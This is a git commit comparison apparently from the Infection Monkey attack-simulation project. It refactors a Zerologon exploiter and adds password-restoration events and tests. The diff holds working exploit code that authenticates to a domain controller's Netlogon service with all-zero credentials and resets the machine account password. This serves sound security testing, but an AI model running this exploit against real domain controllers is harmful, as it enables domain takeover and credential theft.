Compare commits

...

25 Commits

Author SHA1 Message Date
Kekoa Kaaikala 2e0ef1865b UT: Add dummy timestamp to zerologon tests 2022-10-07 20:34:35 +00:00
Kekoa Kaaikala 88d2bf7140 Agent: Add timestamps to publish calls 2022-10-07 20:27:14 +00:00
Kekoa Kaaikala 8eb3c94a94 Agent: Report failed login attempts 2022-10-07 20:14:04 +00:00
Kekoa Kaaikala 74088c8143 Agent: Rename is_exploitable to authenticate 2022-10-07 19:50:21 +00:00
Kekoa Kaaikala 2281d52acc Agent: Move is_exploitable to zerologon.py 2022-10-07 19:46:54 +00:00
Kekoa Kaaikala 374d3d8a50 Agent: Move connect_to_dc to vuln_assessment.py 2022-10-07 19:38:18 +00:00
Ilija Lazoroski 86edb63cb4 Agent: Fix PasswordRestorationEvent tags in Zerologon 2022-10-07 17:50:16 +02:00
Ilija Lazoroski 6adb356e81 Agent: Move Zerologon tag to the implementation
It is not used anywhere else.
2022-10-07 17:50:16 +02:00
Shreya Malviya 559a8c9f66 UT: Improve tests for zerologon 2022-10-07 17:50:16 +02:00
Shreya Malviya 050a84d890 Agent: Move password restoration event publishing in zerologon 2022-10-07 17:50:16 +02:00
Ilija Lazoroski f05d5be32f UT: Add check if we publish events in Zerologon 2022-10-07 17:50:16 +02:00
Shreya Malviya a5e31ee998 Agent: Publish PasswordRestorationEvent in zerologon 2022-10-07 17:50:16 +02:00
Shreya Malviya a50554f115 Agent: Add `target` in CredentialsStolenEvent in zerologon 2022-10-07 17:50:16 +02:00
Shreya Malviya 16ed8d6233 Agent: Remove `time=time()` in calls to `_publish_exploitation_event()` in zerologon since that's the default argument anyway 2022-10-07 17:50:16 +02:00
Shreya Malviya ad47e3be2f UT: Remove unused variables from test_zerologon.py 2022-10-07 17:50:16 +02:00
Shreya Malviya fe178841d0 Agent: Add typehint in zerologon that mypy complained about 2022-10-07 17:50:16 +02:00
Shreya Malviya 0e2f80ded6 Agent: Fix calls to _publish_exploitation_event in zerologon 2022-10-07 17:50:16 +02:00
Shreya Malviya 1cf017c2ac Agent: Remove publishing exploitation attempts in zerologon's vuln assessment 2022-10-07 17:50:16 +02:00
Shreya Malviya 3b60c760e4 Agent: Catch Exception instead of BaseException in zerologon 2022-10-07 17:50:16 +02:00
ilija-lazoroski 237b0ae394 Common: Add PasswordRestorationEvent 2022-10-07 17:50:16 +02:00
Ilija Lazoroski 1db5e9adc5 UT: Add mock_agent_event_queue in zerologon tests 2022-10-07 17:50:16 +02:00
Ilija Lazoroski 9a261296e4 UT: Fix zerologon unit tests 2022-10-07 17:50:16 +02:00
Ilija Lazoroski d3a2fa8a4c Agent: Add zerologon exploiter tag to zerologon_utils 2022-10-07 17:50:16 +02:00
Ilija Lazoroski ef581ff912 Agent: Ignore union-attr mypy error in Zerologon 2022-10-07 17:50:16 +02:00
Ilija Lazoroski e9254aedbd Agent: Publish exploitation events from Zerologon 2022-10-07 17:50:16 +02:00
7 changed files with 287 additions and 110 deletions

View File

@ -4,3 +4,4 @@ from .ping_scan_event import PingScanEvent
from .tcp_scan_event import TCPScanEvent
from .exploitation_event import ExploitationEvent
from .propagation_event import PropagationEvent
from .password_restoration_event import PasswordRestorationEvent

View File

@ -0,0 +1,18 @@
from ipaddress import IPv4Address
from . import AbstractAgentEvent
class PasswordRestorationEvent(AbstractAgentEvent):
"""
An event that occurs when a password has been restored on the target
system
Attributes:
:param target: The IP of the target system on which the
restoration was performed
:param success: If the password restoration was successful
"""
target: IPv4Address
success: bool

View File

@ -9,21 +9,25 @@ import os
import re
import tempfile
from binascii import unhexlify
from time import time
from typing import Dict, List, Optional, Sequence, Tuple
import impacket
from impacket.dcerpc.v5 import epm, nrpc, rpcrt, transport
from impacket.dcerpc.v5 import nrpc, rpcrt
from impacket.dcerpc.v5.dtypes import NULL
from common.agent_events import CredentialsStolenEvent
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
from common.agent_events import CredentialsStolenEvent, PasswordRestorationEvent
from common.credentials import Credentials, LMHash, NTHash, Username
from common.tags import T1003_ATTACK_TECHNIQUE_TAG, T1098_ATTACK_TECHNIQUE_TAG
from common.tags import (
T1003_ATTACK_TECHNIQUE_TAG,
T1098_ATTACK_TECHNIQUE_TAG,
T1210_ATTACK_TECHNIQUE_TAG,
)
from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.wmi_tools import WmiTools
from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets
from infection_monkey.exploit.zerologon_utils.options import OptionsForSecretsdump
from infection_monkey.exploit.zerologon_utils.vuln_assessment import get_dc_details, is_exploitable
from infection_monkey.exploit.zerologon_utils.vuln_assessment import connect_to_dc, get_dc_details
from infection_monkey.exploit.zerologon_utils.wmiexec import Wmiexec
from infection_monkey.i_puppet import ExploiterResultData
from infection_monkey.utils.capture_output import StdoutCapture
@ -34,7 +38,7 @@ logger = logging.getLogger(__name__)
ZEROLOGON_EXPLOITER_TAG = "zerologon-exploiter"
ZEROLOGON_EVENT_TAGS = frozenset(
CREDENTIALS_STOLEN_EVENT_TAGS = frozenset(
{
ZEROLOGON_EXPLOITER_TAG,
T1003_ATTACK_TECHNIQUE_TAG,
@ -42,9 +46,19 @@ ZEROLOGON_EVENT_TAGS = frozenset(
}
)
PASSWORD_RESTORATION_EVENT_TAGS = frozenset({ZEROLOGON_EXPLOITER_TAG})
class ZerologonExploiter(HostExploiter):
_EXPLOITED_SERVICE = "Netlogon"
_EXPLOITER_TAGS = (
ZEROLOGON_EXPLOITER_TAG,
T1003_ATTACK_TECHNIQUE_TAG,
T1098_ATTACK_TECHNIQUE_TAG,
T1210_ATTACK_TECHNIQUE_TAG,
)
_PROPAGATION_TAGS: Tuple[str, ...] = tuple()
MAX_ATTEMPTS = 2000 # For 2000, expected average number of attempts needed: 256.
ERROR_CODE_ACCESS_DENIED = 0xC0000022
@ -61,8 +75,8 @@ class ZerologonExploiter(HostExploiter):
def _exploit_host(self) -> ExploiterResultData:
self.dc_ip, self.dc_name, self.dc_handle = get_dc_details(self.host)
can_exploit, rpc_con = is_exploitable(self)
if can_exploit:
authenticated, rpc_con = self.authenticate()
if authenticated:
logger.info("Target vulnerable, changing account password to empty string.")
if self._is_interrupted():
@ -73,7 +87,7 @@ class ZerologonExploiter(HostExploiter):
logger.debug("Attempting exploit.")
_exploited = self._send_exploit_rpc_login_requests(rpc_con)
rpc_con.disconnect()
rpc_con.disconnect() # type: ignore[union-attr]
else:
logger.info(
@ -99,39 +113,107 @@ class ZerologonExploiter(HostExploiter):
return self.exploit_result
@staticmethod
def connect_to_dc(dc_ip) -> object:
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol="ncacn_ip_tcp")
rpc_transport = transport.DCERPCTransportFactory(binding)
rpc_transport.set_connect_timeout(LONG_REQUEST_TIMEOUT)
rpc_con = rpc_transport.get_dce_rpc()
rpc_con.connect()
rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
return rpc_con
def authenticate(self) -> Tuple[bool, Optional[rpcrt.DCERPC_v5]]:
"""
Attempt to authenticate with the domain controller
:return:
- Whether or not authentication was successful
- An RPC connection on success, otherwise None
"""
# Connect to the DC's Netlogon service.
try:
rpc_con = connect_to_dc(self.dc_ip)
except Exception as err:
error_message = f"Exception occurred while connecting to DC: {err}"
logger.info(error_message)
return False, None
# Try authenticating.
for _ in interruptible_iter(range(0, self.MAX_ATTEMPTS), self.interrupt):
timestamp = time()
try:
rpc_con_auth_result = self._try_zero_authenticate(rpc_con)
if rpc_con_auth_result is not None:
return True, rpc_con_auth_result
error_message = "Failed to authenticate with domain controller"
self._publish_exploitation_event(timestamp, False, error_message=error_message)
except Exception as err:
error_message = f"Error occured while authenticating to {self.host}: {err}"
logger.info(error_message)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
return False, None
return False, None
def _try_zero_authenticate(self, rpc_con: rpcrt.DCERPC_v5) -> rpcrt.DCERPC_v5:
plaintext = b"\x00" * 8
ciphertext = b"\x00" * 8
flags = 0x212FFFFF
# Send challenge and authentication request.
nrpc.hNetrServerReqChallenge(
rpc_con,
self.dc_handle + "\x00",
self.dc_name + "\x00",
plaintext,
)
try:
server_auth = nrpc.hNetrServerAuthenticate3(
rpc_con,
self.dc_handle + "\x00",
self.dc_name + "$\x00",
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
self.dc_name + "\x00",
ciphertext,
flags,
)
assert server_auth["ErrorCode"] == 0
return rpc_con
except nrpc.DCERPCSessionError as ex:
if (
ex.get_error_code() == 0xC0000022
): # STATUS_ACCESS_DENIED error; if not this, probably some other issue.
pass
else:
raise Exception(f"Unexpected error code: {ex.get_error_code()}.")
except BaseException as ex:
raise Exception(f"Unexpected error: {ex}.")
def _send_exploit_rpc_login_requests(self, rpc_con) -> bool:
for _ in interruptible_iter(range(0, self.MAX_ATTEMPTS), self.interrupt):
exploit_attempt_result = self.try_exploit_attempt(rpc_con)
exploit_attempt_result, timestamp = self.try_exploit_attempt(rpc_con)
is_exploited = self.assess_exploit_attempt_result(exploit_attempt_result)
is_exploited = self.assess_exploit_attempt_result(exploit_attempt_result, timestamp)
if is_exploited:
return True
return False
def try_exploit_attempt(self, rpc_con) -> Optional[object]:
def try_exploit_attempt(self, rpc_con) -> Tuple[Optional[object], float]:
error_message = ""
timestamp = time()
try:
exploit_attempt_result = self.attempt_exploit(rpc_con)
return exploit_attempt_result
except nrpc.DCERPCSessionError as e:
return exploit_attempt_result, timestamp
except nrpc.DCERPCSessionError as err:
# Failure should be due to a STATUS_ACCESS_DENIED error.
# Otherwise, the attack is probably not working.
if e.get_error_code() != self.ERROR_CODE_ACCESS_DENIED:
logger.info(f"Unexpected error code from DC: {e.get_error_code()}")
except BaseException as e:
logger.info(f"Unexpected error: {e}")
if err.get_error_code() != self.ERROR_CODE_ACCESS_DENIED:
error_message = f"Unexpected error code from DC: {err.get_error_code()}"
logger.info(error_message)
except Exception as err:
error_message = f"Unexpected error: {err}"
logger.info(error_message)
return None
self._publish_exploitation_event(timestamp, False, error_message=error_message)
return None, timestamp
def attempt_exploit(self, rpc_con: rpcrt.DCERPC_v5) -> object:
request = nrpc.NetrServerPasswordSet2()
@ -152,19 +234,24 @@ class ZerologonExploiter(HostExploiter):
request["SecureChannelType"] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
request["Authenticator"] = authenticator
def assess_exploit_attempt_result(self, exploit_attempt_result) -> bool:
def assess_exploit_attempt_result(self, exploit_attempt_result, timestamp: float) -> bool:
if exploit_attempt_result:
if exploit_attempt_result["ErrorCode"] == 0:
self.report_login_attempt(result=True, user=self.dc_name)
_exploited = True
logger.info("Exploit complete!")
self._publish_exploitation_event(timestamp, True)
else:
self.report_login_attempt(result=False, user=self.dc_name)
_exploited = False
logger.info(
f"Non-zero return code: {exploit_attempt_result['ErrorCode']}. Something "
f"went wrong."
error_message = (
f"Non-zero return code: {exploit_attempt_result['ErrorCode']}."
"Something went wrong."
)
logger.info(error_message)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
return _exploited
return False
@ -202,7 +289,7 @@ class ZerologonExploiter(HostExploiter):
# Connect to the DC's Netlogon service.
try:
rpc_con = ZerologonExploiter.connect_to_dc(self.dc_ip)
rpc_con = connect_to_dc(self.dc_ip)
except Exception as e:
logger.info(f"Exception occurred while connecting to DC: {str(e)}")
return False
@ -310,7 +397,8 @@ class ZerologonExploiter(HostExploiter):
) -> None:
credentials_stolen_event = CredentialsStolenEvent(
source=get_agent_id(),
tags=ZEROLOGON_EVENT_TAGS,
target=self.host.ip_addr,
tags=CREDENTIALS_STOLEN_EVENT_TAGS,
stolen_credentials=extracted_credentials,
)
self.agent_event_queue.publish(credentials_stolen_event)
@ -478,11 +566,22 @@ class ZerologonExploiter(HostExploiter):
def assess_restoration_attempt_result(self, restoration_attempt_result) -> bool:
if restoration_attempt_result:
self._publish_password_restoration_event(success=True)
logger.debug("DC machine account password should be restored to its original value.")
return True
self._publish_password_restoration_event(success=False)
return False
def _publish_password_restoration_event(self, success: bool):
password_restoration_event = PasswordRestorationEvent(
source=get_agent_id(),
target=self.host.ip_addr,
tags=PASSWORD_RESTORATION_EVENT_TAGS,
success=success,
)
self.agent_event_queue.publish(password_restoration_event)
class NetrServerPasswordSet(nrpc.NDRCALL):
opnum = 6

View File

@ -1,17 +1,26 @@
import logging
from typing import Optional, Tuple
from typing import Tuple
import nmb.NetBIOS
from impacket.dcerpc.v5 import nrpc, rpcrt
from impacket.dcerpc.v5 import epm, nrpc, transport
from common.common_consts.timeouts import MEDIUM_REQUEST_TIMEOUT
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
from common.utils.exceptions import DomainControllerNameFetchError
from infection_monkey.model import VictimHost
from infection_monkey.utils.threading import interruptible_iter
logger = logging.getLogger(__name__)
def connect_to_dc(dc_ip) -> object:
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol="ncacn_ip_tcp")
rpc_transport = transport.DCERPCTransportFactory(binding)
rpc_transport.set_connect_timeout(LONG_REQUEST_TIMEOUT)
rpc_con = rpc_transport.get_dce_rpc()
rpc_con.connect()
rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
return rpc_con
def get_dc_details(host: VictimHost) -> Tuple[str, str, str]:
dc_ip = host.ip_addr
dc_name = _get_dc_name(dc_ip=dc_ip)
@ -34,65 +43,3 @@ def _get_dc_name(dc_ip: str) -> str:
raise DomainControllerNameFetchError(
"Couldn't get domain controller's name, maybe it's on external network?"
)
def is_exploitable(zerologon_exploiter_object) -> Tuple[bool, Optional[rpcrt.DCERPC_v5]]:
# Connect to the DC's Netlogon service.
try:
rpc_con = zerologon_exploiter_object.connect_to_dc(zerologon_exploiter_object.dc_ip)
except Exception as e:
logger.info(f"Exception occurred while connecting to DC: {str(e)}")
return False, None
# Try authenticating.
for _ in interruptible_iter(
range(0, zerologon_exploiter_object.MAX_ATTEMPTS), zerologon_exploiter_object.interrupt
):
try:
rpc_con_auth_result = _try_zero_authenticate(zerologon_exploiter_object, rpc_con)
if rpc_con_auth_result is not None:
return True, rpc_con_auth_result
except Exception as ex:
logger.info(ex)
return False, None
return False, None
def _try_zero_authenticate(zerologon_exploiter_object, rpc_con: rpcrt.DCERPC_v5) -> rpcrt.DCERPC_v5:
plaintext = b"\x00" * 8
ciphertext = b"\x00" * 8
flags = 0x212FFFFF
# Send challenge and authentication request.
nrpc.hNetrServerReqChallenge(
rpc_con,
zerologon_exploiter_object.dc_handle + "\x00",
zerologon_exploiter_object.dc_name + "\x00",
plaintext,
)
try:
server_auth = nrpc.hNetrServerAuthenticate3(
rpc_con,
zerologon_exploiter_object.dc_handle + "\x00",
zerologon_exploiter_object.dc_name + "$\x00",
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
zerologon_exploiter_object.dc_name + "\x00",
ciphertext,
flags,
)
assert server_auth["ErrorCode"] == 0
return rpc_con
except nrpc.DCERPCSessionError as ex:
if (
ex.get_error_code() == 0xC0000022
): # STATUS_ACCESS_DENIED error; if not this, probably some other issue.
pass
else:
raise Exception(f"Unexpected error code: {ex.get_error_code()}.")
except BaseException as ex:
raise Exception(f"Unexpected error: {ex}.")

View File

@ -0,0 +1,76 @@
from ipaddress import IPv4Address
from uuid import UUID
import pytest
from common.agent_events import PasswordRestorationEvent
TARGET_IP_STR = "192.168.1.10"
AGENT_ID = UUID("012e7238-7b81-4108-8c7f-0787bc3f3c10")
TIMESTAMP = 1664371327.4067292
PASSWORD_RESTORATION_EVENT = PasswordRestorationEvent(
source=AGENT_ID,
timestamp=TIMESTAMP,
target=IPv4Address(TARGET_IP_STR),
success=True,
)
PASSWORD_RESTORATION_OBJECT_DICT = {
"source": AGENT_ID,
"timestamp": TIMESTAMP,
"target": IPv4Address(TARGET_IP_STR),
"success": True,
}
PASSWORD_RESTORATION_SIMPLE_DICT = {
"source": str(AGENT_ID),
"timestamp": TIMESTAMP,
"target": TARGET_IP_STR,
"success": "true",
}
@pytest.mark.parametrize(
"password_restoration_event_dict",
[PASSWORD_RESTORATION_OBJECT_DICT, PASSWORD_RESTORATION_SIMPLE_DICT],
)
def test_constructor(password_restoration_event_dict):
assert PasswordRestorationEvent(**password_restoration_event_dict) == PASSWORD_RESTORATION_EVENT
@pytest.mark.parametrize(
"key, value",
[
("target", None),
("success", "not-a-bool"),
],
)
def test_construct_invalid_field__type_error(key, value):
invalid_type_dict = PASSWORD_RESTORATION_SIMPLE_DICT.copy()
invalid_type_dict[key] = value
with pytest.raises(TypeError):
PasswordRestorationEvent(**invalid_type_dict)
@pytest.mark.parametrize(
"key, value",
[
("target", "not-an-ip"),
],
)
def test_construct_invalid_field__value_error(key, value):
invalid_type_dict = PASSWORD_RESTORATION_SIMPLE_DICT.copy()
invalid_type_dict[key] = value
with pytest.raises(ValueError):
PasswordRestorationEvent(**invalid_type_dict)
def test_construct__extra_fields_forbidden():
extra_field_dict = PASSWORD_RESTORATION_SIMPLE_DICT.copy()
extra_field_dict["extra_field"] = 99 # red balloons
with pytest.raises(ValueError):
PasswordRestorationEvent(**extra_field_dict)

View File

@ -1,7 +1,11 @@
from unittest.mock import MagicMock
import pytest
DOMAIN_NAME = "domain-name"
IP = "0.0.0.0"
from common.agent_events import ExploitationEvent, PasswordRestorationEvent
from common.event_queue import IAgentEventQueue
from infection_monkey.model import VictimHost
NETBIOS_NAME = "NetBIOS Name"
USERS = ["Administrator", "Bob"]
@ -11,7 +15,12 @@ NT_HASHES = ["def456", "765vut"]
@pytest.fixture
def zerologon_exploiter_object(monkeypatch):
def mock_agent_event_queue():
return MagicMock(spec=IAgentEventQueue)
@pytest.fixture
def zerologon_exploiter_object(monkeypatch, mock_agent_event_queue):
from infection_monkey.exploit.zerologon import ZerologonExploiter
def mock_report_login_attempt(**kwargs):
@ -20,37 +29,57 @@ def zerologon_exploiter_object(monkeypatch):
obj = ZerologonExploiter()
monkeypatch.setattr(obj, "dc_name", NETBIOS_NAME, raising=False)
monkeypatch.setattr(obj, "report_login_attempt", mock_report_login_attempt)
monkeypatch.setattr(obj, "host", VictimHost(ip_addr="1.1.1.1"))
monkeypatch.setattr(obj, "agent_event_queue", mock_agent_event_queue)
return obj
@pytest.mark.slow
def test_assess_exploit_attempt_result_no_error(zerologon_exploiter_object):
def test_assess_exploit_attempt_result_no_error(zerologon_exploiter_object, mock_agent_event_queue):
dummy_exploit_attempt_result = {"ErrorCode": 0}
assert zerologon_exploiter_object.assess_exploit_attempt_result(dummy_exploit_attempt_result)
assert zerologon_exploiter_object.assess_exploit_attempt_result(dummy_exploit_attempt_result, 0)
assert mock_agent_event_queue.publish.call_count == 1
assert mock_agent_event_queue.publish.call_args[0][0].__class__ is ExploitationEvent
assert mock_agent_event_queue.publish.call_args[0][0].success
@pytest.mark.slow
def test_assess_exploit_attempt_result_with_error(zerologon_exploiter_object):
def test_assess_exploit_attempt_result_with_error(
zerologon_exploiter_object, mock_agent_event_queue
):
dummy_exploit_attempt_result = {"ErrorCode": 1}
assert not zerologon_exploiter_object.assess_exploit_attempt_result(
dummy_exploit_attempt_result
dummy_exploit_attempt_result, 0
)
assert mock_agent_event_queue.publish.call_count == 1
assert mock_agent_event_queue.publish.call_args[0][0].__class__ is ExploitationEvent
assert not mock_agent_event_queue.publish.call_args[0][0].success
@pytest.mark.slow
def test_assess_restoration_attempt_result_restored(zerologon_exploiter_object):
def test_assess_restoration_attempt_result_restored(
zerologon_exploiter_object, mock_agent_event_queue
):
dummy_restoration_attempt_result = object()
assert zerologon_exploiter_object.assess_restoration_attempt_result(
dummy_restoration_attempt_result
)
assert mock_agent_event_queue.publish.call_count == 1
assert mock_agent_event_queue.publish.call_args[0][0].__class__ is PasswordRestorationEvent
assert mock_agent_event_queue.publish.call_args[0][0].success
@pytest.mark.slow
def test_assess_restoration_attempt_result_not_restored(zerologon_exploiter_object):
def test_assess_restoration_attempt_result_not_restored(
zerologon_exploiter_object, mock_agent_event_queue
):
dummy_restoration_attempt_result = False
assert not zerologon_exploiter_object.assess_restoration_attempt_result(
dummy_restoration_attempt_result
)
assert mock_agent_event_queue.publish.call_count == 1
assert mock_agent_event_queue.publish.call_args[0][0].__class__ is PasswordRestorationEvent
assert not mock_agent_event_queue.publish.call_args[0][0].success
@pytest.mark.slow

View File

@ -7,7 +7,13 @@ from common.agent_configuration.agent_sub_configurations import (
CustomPBAConfiguration,
ScanTargetConfiguration,
)
from common.agent_events import ExploitationEvent, PingScanEvent, PropagationEvent, TCPScanEvent
from common.agent_events import (
ExploitationEvent,
PasswordRestorationEvent,
PingScanEvent,
PropagationEvent,
TCPScanEvent,
)
from common.credentials import Credentials, LMHash, NTHash
from common.tags import (
T1021_ATTACK_TECHNIQUE_TAG,
@ -336,6 +342,7 @@ T1222_ATTACK_TECHNIQUE_TAG
T1570_ATTACK_TECHNIQUE_TAG
HostExploiter._publish_propagation_event
HostExploiter._publish_exploitation_event
PasswordRestorationEvent
# pydantic base models
underscore_attrs_are_private